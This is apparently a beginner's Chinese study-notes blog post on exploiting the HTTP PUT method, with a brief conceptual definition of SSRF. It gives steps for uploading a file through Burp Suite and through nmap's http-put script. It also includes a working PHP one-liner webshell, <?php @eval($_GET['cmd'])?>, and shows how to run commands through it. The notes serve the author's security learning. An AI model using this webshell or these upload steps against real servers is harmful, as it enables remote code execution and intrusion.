---------------开始---------------
0x01:前言
之前在挖公益SRC的时候,用Nmap扫描时候可以扫到http支持的方法,其中有几个可以利用PUT方法,作为标准的小菜鸟,听说过这个方法,但是具体利用可真不会呀,也在网上找了相关文章,但是都不详细。直到昨天看到一篇文章,今天上午拿来学习了一番,具体讲的是如何利用,这个确实不错,对于实战来说提升很大。回过头来去找那几个网站,可是PUT方法已经被禁用了,对于这个方法的实战,有缘见到一定好好鼓捣一番。
那篇文章有很多利用方法,基于我现在也只学了两招利用的方法,对于我来说够用了。
对于SSRF今天基本看了下概念,大致了解了理论的意思,但是具体实战今天确实没做,过两天找两个例子去实战一下,加深一下SSRF的理解。这个漏洞也一定要熟练掌握。
---------------正题(一)---------------
●HTTP Put方法利用:
PUT方法请求服务器去把请求里的实体存储在请求URI(Request-URI)标识下。
▶▶▶.BurpSuite利用Put方法:
①.设置相关代理 ---> 抓包拦截请求 ---> 右击发送到Repeater模块
②.将GET方法替换为PUT方法 ---> 上传一个test.php文件
③.在请求体中写上恶意利用代码(写个一句话木马就可以了)
♢穿插一个PHP一句话木马(<?php @eval($_GET["cmd"])?> )
④.如果响应头的状态码显示"201 Created",说明已被成功创建
⑤. 创建成功后一句话木马的利用,xxx.com/test.php?cmd="想要执行的命令"
▶▶▶.Nmap利用Put方法:
利用命令:
nmap -p 80 目标IP地址 -script http-put -script-args http-put.url="需上传目标网址的路径", http-put.file="你要上传文件的位置"
若显示:"http-put: /xxx/test.php was Successfully created" 说明上传成功了
注:其实整理这两个是为了留给自己看了,下面贴一下那篇文章的地方,对于Put方法的利用大概有个六七种,大家都可以学习一下~
通往知识的大门:http://www.4hou.com/technology/12885.html
---------------正题(二)---------------
●服务端请求伪造(Server-Side Request Forgery, SSRF)
▶定义:
由攻击者构造形成由服务端发起请求的一个安全漏洞,一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。正因它是由服务端发起的,故它能够请求到与它相连而与外网隔离的内部系统。
▶形成原因:
服务端提供了从其他服务器应用获取数据的功能,但没有对目标地址过滤与限制。
今天对于SSRF仅是了解了个概念,然后就去找SRC实战挖洞了,今天毫无战果。对于SSRF的实战回来找个靶机来试试,到时在来这记录下。
--------今天就这么结束了,时间过得真快--------
